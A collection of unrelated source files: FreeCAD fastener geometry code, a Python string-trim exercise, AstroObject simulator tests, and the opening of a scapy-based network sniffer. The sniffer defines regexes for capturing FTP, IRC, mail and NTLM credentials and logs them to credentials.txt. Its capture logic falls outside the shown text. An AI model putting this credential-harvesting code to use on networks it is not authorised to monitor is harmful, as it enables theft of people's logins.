hex2Cut = HCFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
hexShell = hexShell.cut(hex2Cut)
# Part.show(hexShell)
topFaces.extend(hexShell.Faces)
if self.rThread and (dia > 4.0):
aWire = Part.Wire([edge2, edge3, edge4])
boltIndex = 3
else:
if self.rThread:
Pnt7 = Base.Vector(dia / 2.1 - H * 5.0 / 8.0, 0.0, m - cham_i)
Pnt6 = Base.Vector(dia / 2.1 - H * 5.0 / 8.0, 0.0, 0.0 + cham_i)
else:
Pnt7 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, m - cham_i)
Pnt6 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, 0.0 + cham_i)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.makeLine(Pnt7, PntH0)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7])
boltIndex = 6
# aFace =Part.Face(aWire)
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(headShell)
chamFace = headShell.Faces[0].cut(solidHex)
# Part.show(chamFace)
topFaces.append(chamFace.Faces[0])
for i in range(1, boltIndex):
topFaces.append(headShell.Faces[i])
if self.rThread:
if dia < 5.0:
nutShell = Part.Shell(topFaces)
nut = Part.Solid(nutShell)
# Part.show(nut, 'unthreadedNut')
threadCutter = self.makeInnerThread_2(dia, P, int(turns + 1), None, m)
threadCutter.translate(Base.Vector(0.0, 0.0, turns * P + 0.5 * P))
# Part.show(threadCutter, 'threadCutter')
nut = nut.cut(threadCutter)
else:
threadShell = self.makeInnerThread_2(dia, P, int(turns), da, m)
# threadShell.translate(Base.Vector(0.0, 0.0,turns*P))
# Part.show(threadShell)
for tFace in threadShell.Faces:
topFaces.append(tFace)
headShell = Part.Shell(topFaces)
nut = Part.Solid(headShell)
else:
nutShell = Part.Shell(topFaces)
nut = Part.Solid(nutShell)
return nut
# make ISO 7380-1 Button head Screw
# make ISO 7380-2 Button head Screw with collar
# make DIN 967 cross recessed pan head Screw with collar
def makeScrewTap(self, SType='ScrewTap', ThreadType='M6', l=25.0, customPitch=None, customDia=None):
if ThreadType != 'Custom':
dia = self.getDia(ThreadType, True)
if SType == "ScrewTap":
P, tunIn, tunEx = FsData["tuningTable"][ThreadType]
elif SType == 'ScrewTapInch':
P = FsData["asmeb18.3.1adef"][ThreadType][0]
else: # custom pitch and diameter
P = customPitch
if self.sm3DPrintMode:
dia = self.smNutThrScaleA * customDia + self.smNutThrScaleB
else:
dia = customDia
residue, turns = math.modf(l / P)
# FreeCAD.Console.PrintMessage("turns:" + str(turns) + "res: " + str(residue) + "\n")
if residue > 0.00001:
turns += 1.0
if self.rThread:
screwTap = self.makeInnerThread_2(dia, P, int(turns), None, 0.0)
# screwTap.translate(Base.Vector(0.0, 0.0, (1-residue)*P))
else:
H = P * math.cos(math.radians(30)) # Thread depth H
r = dia / 2.0
# points for inner thread profile
adjusted_l = turns * P
Pnt0 = Base.Vector(0.0, 0.0, 0)
Pnt1 = Base.Vector(r - H * 5.0 / 8.0, 0.0, 0)
Pnt2 = Base.Vector(r - H * 5.0 / 8.0, 0.0, -adjusted_l)
Pnt3 = Base.Vector(0.0, 0.0, -adjusted_l)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.makeLine(Pnt2, Pnt3)
aWire = Part.Wire([edge1, edge2, edge3])
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
screwTap = Part.Solid(headShell)
screwTap.translate(Base.Vector(0.0, 0.0, -12.7))
return screwTap
# make object to cut external threads on a shaft
def makeScrewDie(self, SType="ScrewDie", ThreadType='M6', l=25.0, customPitch=None, customDia=None):
if ThreadType != "Custom":
dia = self.getDia(ThreadType, False)
if SType == "ScrewDie":
P, tunIn, tunEx = FsData["tuningTable"][ThreadType]
elif SType == "ScrewDieInch":
P = FsData["asmeb18.3.1adef"][ThreadType][0]
else: # custom pitch and diameter
P = customPitch
if self.sm3DPrintMode:
dia = self.smScrewThrScaleA * customDia + self.smScrewThrScaleB
else:
dia = customDia
if self.rThread:
cutDia = dia * 0.75
else:
cutDia = dia
refpoint = Base.Vector(0, 0, -1 * l)
screwDie = Part.makeCylinder(dia * 1.1 / 2, l, refpoint)
screwDie = screwDie.cut(Part.makeCylinder(cutDia / 2, l, refpoint))
if self.rThread:
residue, turns = math.modf(l / P)
turns += 2.0
halfturns = 2 * turns
shell_thread = self.makeShellthread(dia, P, halfturns, False, 0)
thr_p1 = Base.Vector(0, 0, 2 * P)
thr_p2 = Base.Vector(dia / 2, 0, 2 * P)
thr_e1 = Part.makeLine(thr_p1, thr_p2)
thr_cap_profile = Part.Wire([thr_e1])
thr_cap = thr_cap_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
thr_faces = shell_thread.Faces
thr_faces.extend(thr_cap.Faces)
thread_shell = Part.Shell(thr_faces)
thread_solid = Part.Solid(thread_shell)
screwDie = screwDie.cut(thread_solid)
return screwDie
# make a length of standard threaded rod
def makeThreadedRod(self, SType="ThreadedRod", ThreadType='M6', l=25.0, customPitch=None, customDia=None):
if ThreadType != 'Custom':
dia = self.getDia(ThreadType, False)
if SType == 'ThreadedRod':
P, tunIn, tunEx = FsData['tuningTable'][ThreadType]
elif SType == 'ThreadedRodInch':
P = FsData['asmeb18.3.1adef'][ThreadType][0]
else: # custom pitch and diameter
P = customPitch
if self.sm3DPrintMode:
dia = self.smScrewThrScaleA * customDia + self.smScrewThrScaleB
else:
dia = customDia
dia = dia * 1.01
cham = P
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(dia / 2 - cham, 0, 0)
p2 = Base.Vector(dia / 2, 0, 0 - cham)
p3 = Base.Vector(dia / 2, 0, -1 * l + cham)
p4 = Base.Vector(dia / 2 - cham, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e1, e2, e3, e4, e5])
p_shell = p_profile.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
screw = Part.Solid(p_shell)
if self.rThread:
dia = dia / 1.01
residue, turns = math.modf(l / P)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 7
else:
halfturns = halfturns + 6
# make the threaded section
shell_thread = self.makeShellthread(dia, P, halfturns, False, 0)
thr_p1 = Base.Vector(0, 0, 2 * P)
thr_p2 = Base.Vector(dia / 2, 0, 2 * P)
thr_e1 = Part.makeLine(thr_p1, thr_p2)
thr_cap_profile = Part.Wire([thr_e1])
thr_cap = thr_cap_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
thr_faces = shell_thread.Faces
thr_faces.extend(thr_cap.Faces)
thread_shell = Part.Shell(thr_faces)
thread_solid = Part.Solid(thread_shell)
thread_solid.translate(Base.Vector(0, 0, 2 * P))
screw = screw.common(thread_solid)
return screw
def cutChamfer(self, dia_cC, P_cC, l_cC):
cham_t = P_cC * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntC0 = Base.Vector(0.0, 0.0, -l_cC)
PntC1 = Base.Vector(dia_cC / 2.0 - cham_t, 0.0, -l_cC)
PntC2 = Base.Vector(dia_cC / 2.0 + cham_t, 0.0, -l_cC + cham_t + cham_t)
PntC3 = Base.Vector(dia_cC / 2.0 + cham_t, 0.0, -l_cC - P_cC - cham_t)
PntC4 = Base.Vector(0.0, 0.0, -l_cC - P_cC - cham_t)
edgeC1 = Part.makeLine(PntC0, PntC1)
edgeC2 = Part.makeLine(PntC1, PntC2)
edgeC3 = Part.makeLine(PntC2, PntC3)
edgeC4 = Part.makeLine(PntC3, PntC4)
edgeC5 = Part.makeLine(PntC4, PntC0)
CWire = Part.Wire([edgeC1, edgeC2, edgeC3, edgeC4, edgeC5])
# Part.show(CWire)
CFace = Part.Face(CWire)
cyl = CFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
return cyl
# cross recess type H
def makeCross_H3(self, CrossType='2', m=6.9, h=0.0):
# m = diameter of cross at top of screw at reference level for penetration depth
b, e_mean, g, f_mean, r, t1, alpha, beta = FsData["iso4757def"][CrossType]
rad265 = math.radians(26.5)
rad28 = math.radians(28.0)
tg = (m - g) / 2.0 / math.tan(rad265) # depth at radius of g
t_tot = tg + g / 2.0 * math.tan(rad28) # total depth
# print 'tg: ', tg,' t_tot: ', t_tot
hm = m / 4.0
hmc = m / 2.0
rmax = m / 2.0 + hm * math.tan(rad265)
Pnt0 = Base.Vector(0.0, 0.0, hm)
Pnt1 = Base.Vector(rmax, 0.0, hm)
Pnt3 = Base.Vector(0.0, 0.0, 0.0)
Pnt4 = Base.Vector(g / 2.0, 0.0, -tg)
Pnt5 = Base.Vector(0.0, 0.0, -t_tot)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge3 = Part.makeLine(Pnt1, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt5)
# FreeCAD.Console.PrintMessage("Edges made Pnt2: " + str(Pnt2) + "\n")
aWire = Part.Wire([edge1, edge3, edge4])
crossShell = aWire.revolve(Pnt3, Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("Peak-wire revolved: " + str(e_mean) + "\n")
cross = Part.Solid(crossShell)
# Part.show(cross)
# the need to cut 4 corners out of the above shape.
# Definition of corner
# The angles 92 degrees and alpha are defined on a plane which has
# an angle of beta against our coordinate system.
# The projected angles are needed for easier calculation!
rad_alpha = math.radians(alpha / 2.0)
rad92 = math.radians(92.0 / 2.0)
rad_beta = math.radians(beta)
rad_alpha_p = math.atan(math.tan(rad_alpha) / math.cos(rad_beta))
rad92_p = math.atan(math.tan(rad92) / math.cos(rad_beta))
tb = tg + (g - b) / 2.0 * math.tan(rad28) # depth at dimension b
rbtop = b / 2.0 + (hmc + tb) * math.tan(rad_beta) # radius of b-corner at hm
rbtot = b / 2.0 - (t_tot - tb) * math.tan(rad_beta) # radius of b-corner at t_tot
dre = e_mean / 2.0 / math.tan(rad_alpha_p) # delta between corner b and corner e in x direction
# FreeCAD.Console.PrintMessage("delta calculated: " + str(dre) + "\n")
dx = m / 2.0 * math.cos(rad92_p)
dy = m / 2.0 * math.sin(rad92_p)
PntC0 = Base.Vector(rbtop, 0.0, hmc)
PntC1 = Base.Vector(rbtot, 0.0, -t_tot)
PntC2 = Base.Vector(rbtop + dre, +e_mean / 2.0, hmc)
PntC3 = Base.Vector(rbtot + dre, +e_mean / 2.0, -t_tot)
PntC4 = Base.Vector(rbtop + dre, -e_mean / 2.0, hmc)
PntC5 = Base.Vector(rbtot + dre, -e_mean / 2.0, -t_tot)
PntC6 = Base.Vector(rbtop + dre + dx, +e_mean / 2.0 + dy, hmc)
# PntC7 = Base.Vector(rbtot+dre+dx,+e_mean/2.0+dy,-t_tot)
PntC7 = Base.Vector(rbtot + dre + 2.0 * dx, +e_mean + 2.0 * dy, -t_tot)
PntC8 = Base.Vector(rbtop + dre + dx, -e_mean / 2.0 - dy, hmc)
# PntC9 = Base.Vector(rbtot+dre+dx,-e_mean/2.0-dy,-t_tot)
PntC9 = Base.Vector(rbtot + dre + 2.0 * dx, -e_mean - 2.0 * dy, -t_tot)
# wire_hm = Part.makePolygon([PntC0,PntC2,PntC6,PntC8,PntC4,PntC0])
# face_hm =Part.Face(wire_hm)
# Part.show(face_hm)
wire_t_tot = Part.makePolygon([PntC1, PntC3, PntC7, PntC9, PntC5, PntC1])
# Part.show(wire_t_tot)
edgeC1 = Part.makeLine(PntC0, PntC1)
# FreeCAD.Console.PrintMessage("edgeC1 with PntC9" + str(PntC9) + "\n")
makeSolid = True
isFrenet = False
corner = Part.Wire(edgeC1).makePipeShell([wire_t_tot], makeSolid, isFrenet)
# Part.show(corner)
rot_axis = Base.Vector(0., 0., 1.0)
sin_res = math.sin(math.radians(90) / 2.0)
cos_res = math.cos(math.radians(90) / 2.0)
rot_axis.multiply(-sin_res) # Calculation of Quaternion-Elements
# FreeCAD.Console.PrintMessage("Quaternion-Elements" + str(cos_res) + "\n")
pl_rot = FreeCAD.Placement()
pl_rot.Rotation = (rot_axis.x, rot_axis.y, rot_axis.z, cos_res) # Rotation-Quaternion 90° z-Axis
crossShell = crossShell.cut(corner)
# Part.show(crossShell)
cutplace = corner.Placement
cornerFaces = []
cornerFaces.append(corner.Faces[0])
cornerFaces.append(corner.Faces[1])
cornerFaces.append(corner.Faces[3])
cornerFaces.append(corner.Faces[4])
cornerShell = Part.Shell(cornerFaces)
cornerShell = cornerShell.common(cross)
addPlace = cornerShell.Placement
crossFaces = cornerShell.Faces
for i in range(3):
cutplace.Rotation = pl_rot.Rotation.multiply(corner.Placement.Rotation)
corner.Placement = cutplace
crossShell = crossShell.cut(corner)
addPlace.Rotation = pl_rot.Rotation.multiply(cornerShell.Placement.Rotation)
cornerShell.Placement = addPlace
for coFace in cornerShell.Faces:
crossFaces.append(coFace)
# Part.show(crossShell)
for i in range(1, 6):
crossFaces.append(crossShell.Faces[i])
crossShell0 = Part.Shell(crossFaces)
crossFaces.append(crossShell.Faces[0])
crossShell = Part.Shell(crossFaces)
cross = Part.Solid(crossShell)
# FreeCAD.Console.PrintMessage("Placement: " + str(pl_rot) + "\n")
cross.Placement.Base = Base.Vector(0.0, 0.0, h)
crossShell0.Placement.Base = Base.Vector(0.0, 0.0, h)
# Part.show(crossShell0)
# Part.show(cross)
return cross, crossShell0
# Allen recess cutting tool
# Parameters used: s_mean, k, t_min, dk
def makeAllen2(self, s_a=3.0, t_a=1.5, h_a=2.0, t_2=0.0):
# h_a top height location of cutting tool
# s_a hex width
# t_a dept of the allen
# t_2 depth of center-bore
if t_2 == 0.0:
depth = s_a / 3.0
e_cham = 2.0 * s_a / math.sqrt(3.0)
# FreeCAD.Console.PrintMessage("allen tool: " + str(s_a) + "\n")
# Points for an arc at the peak of the cone
rCone = e_cham / 4.0
hyp = (depth * math.sqrt(e_cham ** 2 / depth ** 2 + 1.0) * rCone) / e_cham
radAlpha = math.atan(e_cham / depth)
radBeta = math.pi / 2.0 - radAlpha
zrConeCenter = hyp - depth - t_a
xArc1 = math.sin(radBeta) * rCone
zArc1 = zrConeCenter - math.cos(radBeta) * rCone
xArc2 = math.sin(radBeta / 2.0) * rCone
zArc2 = zrConeCenter - math.cos(radBeta / 2.0) * rCone
zArc3 = zrConeCenter - rCone
# The round part of the cutting tool, we need for the allen hex recess
PntH1 = Base.Vector(0.0, 0.0, -t_a - depth - depth)
PntH2 = Base.Vector(e_cham, 0.0, -t_a - depth - depth)
PntH3 = Base.Vector(e_cham, 0.0, -t_a + depth)
PntH4 = Base.Vector(0.0, 0.0, -t_a - depth)
PntA1 = Base.Vector(xArc1, 0.0, zArc1)
PntA2 = Base.Vector(xArc2, 0.0, zArc2)
PntA3 = Base.Vector(0.0, 0.0, zArc3)
edgeA1 = Part.Arc(PntA1, PntA2, PntA3).toShape()
edgeH1 = Part.makeLine(PntH1, PntH2)
edgeH2 = Part.makeLine(PntH2, PntH3)
edgeH3 = Part.makeLine(PntH3, PntA1)
edgeH4 = Part.makeLine(PntA3, PntH1)
hWire = Part.Wire([edgeH1, edgeH2, edgeH3, edgeA1, edgeH4])
hex_depth = -1.0 - t_a - depth * 1.1
else:
e_cham = 2.0 * s_a / math.sqrt(3.0)
d_cent = s_a / 3.0
depth_cent = d_cent * math.tan(math.pi / 6.0)
depth_cham = (e_cham - d_cent) * math.tan(math.pi / 6.0)
Pnts = [
Base.Vector(0.0, 0.0, -t_2 - depth_cent),
Base.Vector(0.0, 0.0, -t_2 - depth_cent - depth_cent),
Base.Vector(e_cham, 0.0, -t_2 - depth_cent - depth_cent),
Base.Vector(e_cham, 0.0, -t_a + depth_cham),
Base.Vector(d_cent, 0.0, -t_a),
Base.Vector(d_cent, 0.0, -t_2)
]
edges = []
for i in range(0, len(Pnts) - 1):
edges.append(Part.makeLine(Pnts[i], Pnts[i + 1]))
edges.append(Part.makeLine(Pnts[5], Pnts[0]))
hWire = Part.Wire(edges)
hex_depth = -1.0 - t_2 - depth_cent * 1.1
# Part.show(hWire)
hFace = Part.Face(hWire)
roundtool = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# create hexagon
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s_a / math.sqrt(3.0), 0.0, 1.0)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexFace = Part.Face(hexagon)
solidHex = hexFace.extrude(Base.Vector(0.0, 0.0, hex_depth))
allen = solidHex.cut(roundtool)
# Part.show(allen)
allenFaces = [allen.Faces[0]]
for i in range(2, len(allen.Faces)):
allenFaces.append(allen.Faces[i])
allenShell = Part.Shell(allenFaces)
solidHex.Placement.Base = Base.Vector(0.0, 0.0, h_a)
allenShell.Placement.Base = Base.Vector(0.0, 0.0, h_a)
return solidHex, allenShell
# ISO 10664 Hexalobular internal driving feature for bolts and screws
def makeIso10664_3(self, RType='T20', t_hl=3.0, h_hl=0):
# t_hl depth of the recess
# h_hl top height location of Cutting tool
A, B, Re = FsData["iso10664def"][RType]
sqrt_3 = math.sqrt(3.0)
depth = A / 4.0
offSet = 1.0
# Chamfer cutter for the hexalobular recess
PntH1 = Base.Vector(0.0, 0.0, -t_hl - depth - 1.0)
# PntH2 = Base.Vector(A/2.0*1.02,0.0,-t_hl-depth-1.0)
# PntH3 = Base.Vector(A/2.0*1.02,0.0,-t_hl)
PntH2 = Base.Vector(A, 0.0, -t_hl - depth - 1.0)
PntH3 = Base.Vector(A, 0.0, -t_hl + depth)
PntH4 = Base.Vector(0.0, 0.0, -t_hl - depth)
# Points for an arc at the peak of the cone
rCone = A / 4.0
hyp = (depth * math.sqrt(A ** 2 / depth ** 2 + 1.0) * rCone) / A
radAlpha = math.atan(A / depth)
radBeta = math.pi / 2.0 - radAlpha
zrConeCenter = hyp - depth - t_hl
xArc1 = math.sin(radBeta) * rCone
zArc1 = zrConeCenter - math.cos(radBeta) * rCone
xArc2 = math.sin(radBeta / 2.0) * rCone
zArc2 = zrConeCenter - math.cos(radBeta / 2.0) * rCone
zArc3 = zrConeCenter - rCone
PntA1 = Base.Vector(xArc1, 0.0, zArc1)
PntA2 = Base.Vector(xArc2, 0.0, zArc2)
PntA3 = Base.Vector(0.0, 0.0, zArc3)
edgeA1 = Part.Arc(PntA1, PntA2, PntA3).toShape()
edgeH1 = Part.makeLine(PntH1, PntH2)
edgeH2 = Part.makeLine(PntH2, PntH3)
edgeH3 = Part.makeLine(PntH3, PntA1)
edgeH4 = Part.makeLine(PntA3, PntH1)
hWire = Part.Wire([edgeH1, edgeH2, edgeH3, edgeA1])
cutShell = hWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
cutTool = Part.Solid(cutShell)
Ri = -((B + sqrt_3 * (2. * Re - A)) * B + (A - 4. * Re) * A) / (4. * B - 2. * sqrt_3 * A + (4. * sqrt_3 - 8.) * Re)
# print '2nd Ri last solution: ', Ri
beta = math.acos(A / (4 * Ri + 4 * Re) - (2 * Re) / (4 * Ri + 4 * Re)) - math.pi / 6
# print 'beta: ', beta
Rh = (sqrt_3 * (A / 2.0 - Re)) / 2.0
Re_x = A / 2.0 - Re + Re * math.sin(beta)
Re_y = Re * math.cos(beta)
Ri_y = B / 4.0
Ri_x = sqrt_3 * B / 4.0
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
hexlobWireList = []
PntRe0 = Base.Vector(Re_x, -Re_y, offSet)
PntRe1 = Base.Vector(A / 2.0, 0.0, offSet)
PntRe2 = Base.Vector(Re_x, Re_y, offSet)
edge0 = Part.Arc(PntRe0, PntRe1, PntRe2).toShape()
# Part.show(edge0)
hexlobWireList.append(edge0)
PntRi = Base.Vector(Ri_x, Ri_y, offSet)
PntRi2 = mhex.multiply(PntRe0)
edge1 = Part.Arc(PntRe2, PntRi, PntRi2).toShape()
# Part.show(edge1)
hexlobWireList.append(edge1)
for i in range(5):
PntRe1 = mhex.multiply(PntRe1)
PntRe2 = mhex.multiply(PntRe2)
edge0 = Part.Arc(PntRi2, PntRe1, PntRe2).toShape()
hexlobWireList.append(edge0)
PntRi = mhex.multiply(PntRi)
PntRi2 = mhex.multiply(PntRi2)
if i == 5:
edge1 = Part.Arc(PntRe2, PntRi, PntRe0).toShape()
else:
edge1 = Part.Arc(PntRe2, PntRi, PntRi2).toShape()
hexlobWireList.append(edge1)
hexlobWire = Part.Wire(hexlobWireList)
# Part.show(hWire)
face = Part.Face(hexlobWire)
# Extrude in z to create the cutting tool for the screw-head-face
Helo = face.extrude(Base.Vector(0.0, 0.0, -t_hl - depth - offSet))
# Make the recess-shell for the screw-head-shell
hexlob = Helo.cut(cutTool)
# Part.show(hexlob)
hexlobFaces = [hexlob.Faces[0]]
for i in range(2, 15):
hexlobFaces.append(hexlob.Faces[i])
hexlobShell = Part.Shell(hexlobFaces)
hexlobShell.Placement.Base = Base.Vector(0.0, 0.0, h_hl)
Helo.Placement.Base = Base.Vector(0.0, 0.0, h_hl)
return Helo, hexlobShell
def setThreadType(self, TType='simple'):
self.simpThread = False
self.symThread = False
self.rThread = False
if TType == 'simple':
self.simpThread = True
if TType == 'symbol':
self.symThread = True
if TType == 'real':
self.rThread = True
def setTuner(self, myTuner=511):
self.Tuner = myTuner
def getDia(self, ThreadType, isNut):
threadstring = ThreadType.strip("()")
dia = FsData["DiaList"][threadstring][0]
if self.sm3DPrintMode:
if isNut:
dia = self.smNutThrScaleA * dia + self.smNutThrScaleB
else:
dia = self.smScrewThrScaleA * dia + self.smScrewThrScaleB
return dia
def getLength(self, LenStr):
# washers and nuts pass an int (1), for their unused length attribute
# handle this circumstance if necessary
if type(LenStr) == int:
return LenStr
# otherwise convert the string to a number using predefined rules
if 'in' not in LenStr:
LenFloat = float(LenStr)
else:
components = LenStr.strip('in').split(' ')
total = 0
for item in components:
if '/' in item:
subcmpts = item.split('/')
total += float(subcmpts[0]) / float(subcmpts[1])
else:
total += float(item)
LenFloat = total * 25.4
return LenFloat
class ScrewMacro(object):
d = QtGui.QWidget()
d.ui = Ui_ScrewMaker()
d.ui.setupUi(d)
if __name__ == '__main__':
d.show()
def main():
o = ScrewMacro()
if __name__ == '__main__':
main()
| shaise/FreeCAD_FastenersWB | screw_maker.py | Python | gpl-2.0 | 194,972 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 利用Python的切片功能实现一个类似trim去掉字符串两边空格的方法
def trim1(s):
"""利用迭代来实现"""
if s[:1] != " " and s[-1:] != " ":
return s
elif s[:1] == " ":
return trim1(s[1:])
elif s[-1:] == " ":
return trim1(s[:-1])
def trim(s):
"""更简洁的利用循环来实现"""
while s[:1] == " ":
s = s[1:]
while s[-1:] == " ":
s = s[:-1]
return s
# 测试
if trim('hello ') != 'hello':
print('测试失败!')
elif trim(' hello') != 'hello':
print('测试失败!')
elif trim(' hello ') != 'hello':
print('测试失败!')
elif trim(' hello world ') != 'hello world':
print('测试失败!')
elif trim('') != '':
print('测试失败!')
elif trim(' ') != '':
print('测试失败!')
else:
print('测试成功!')
| felix9064/python | Demo/liaoxf/slice_trim.py | Python | mit | 903 |
# -*- coding: utf-8 -*-
#
# Test_simulator.py
# AstroObject
#
# Created by Alexander Rudy on 2012-01-11.
# Copyright 2012 Alexander Rudy. All rights reserved.
# Version 0.6.1
#
from tests.apitests import *
import AstroObject.simulator as AS
from AstroObject.cache import *
import nose.tools as nt
from nose.plugins.skip import Skip,SkipTest
import numpy as np
import pyfits as pf
import scipy as sp
import matplotlib as mpl
import matplotlib.pyplot as plt
import os
import logging
class test_Simulator(API_Base):
"""AstroObject.simulator"""
attributes = ["SIMULATOR"]
def setup(self):
"""Set up the simulator"""
self.SIMULATOR = AS.Simulator("Tester")
super(test_Simulator, self).setup()
def test_registerStage(self):
"""registerStage()"""
self.SIMULATOR.registerStage(abs,"abs")
assert "abs" in self.SIMULATOR.stages
class test_SimulatorFunctional(object):
"""Functional tests for simulator"""
def stest_BasicSimulation(self):
"""A very simple simulation with caching"""
SIM = AS.Simulator(name="Loggy",commandLine=False)
class SimpleStage(object):
def __init__(self,SIM):
super(SimpleStage, self).__init__()
self.name = "SimpleStage"
self.sim = SIM
def run(self):
print "Hello from %s Object" % self.name
img = self.sim.Caches["Random Image"]
self.A = img[0,0]
def other(self):
"""Other Stage Function"""
print "Hello from %s Stage" % "other"
img = self.sim.Caches["Random NPY"]
self.B = img[1,1]
def last(self):
"""Last Stage Function"""
print "Last Stage"
img = self.sim.Caches["Random Image"]
self.C = img[0,0]
def save(self,data):
"""Saves some cache data"""
np.save("Caches/Test.npy",data)
def cache(self):
"""Cache this image"""
return np.random.normal(10,2,(1000,1000))
def load(self):
"""Load the image"""
return np.load("Caches/Test.npy")
stage = SimpleStage(SIM)
log = logging.getLogger("Loggy")
log.useConsole(False)
SIM.registerStage(stage.run,name="examp",description="Example Stage",include=True)
SIM.registerStage(stage.other,name="other",description="Other Stage",include=True)
SIM.registerStage(stage.last,name="last",description="Last Stage",include=True)
SIM.registerStage(None,"ex",dependencies=["examp","other"],help="example Macro")
SIM.Caches["Random Image"] = Cache(stage.cache,stage.load,stage.save)
SIM.Caches["Random NPY"] = NumpyCache(stage.cache,"Caches/Random.npy")
SIM.Caches.clear()
SIM.startup()
SIM.do("all")
log.useConsole(True)
assert stage.A == stage.C
assert stage.A != stage.B
assert stage.B != stage.C
| alexrudy/AstroObject | tests/test_simulator.py | Python | gpl-3.0 | 3,211 |
#!/usr/bin/env python2
from os import geteuid, devnull
import logging
# shut up scapy
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb=0
from sys import exit
import binascii
import struct
import argparse
import signal
import base64
from urllib import unquote
from subprocess import Popen, PIPE
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from urllib import unquote
import binascii
# Debug
#from IPython import embed
##########################
# Potention ToDo:
# MySQL seed:hash
# VNC
# Oracle?
# Add file carving from dissectors.py
#########################
# Unintentional code contributors:
# Laurent Gaffie
# psychomario
logging.basicConfig(filename='credentials.txt',level=logging.INFO)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
#Console colors
W = '\033[0m' # white (normal)
T = '\033[93m' # tan
def parse_args():
"""Create the arguments"""
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--interface", help="Choose an interface")
parser.add_argument("-p", "--pcap", help="Parse info from a pcap file; -p <pcapfilename>")
parser.add_argument("-f", "--filterip", help="Do not sniff packets from this IP address; -f 192.168.0.4")
parser.add_argument("-v", "--verbose", help="Display entire URLs and POST loads rather than truncating at 100 characters", action="store_true")
return parser.parse_args()
def iface_finder():
try:
ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
for line in ipr.communicate()[0].splitlines():
if 'default' in line:
l = line.split()
iface = l[4]
return iface
except IOError:
exit('[-] Could not find an internet active interface; please specify one with -i <interface>')
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
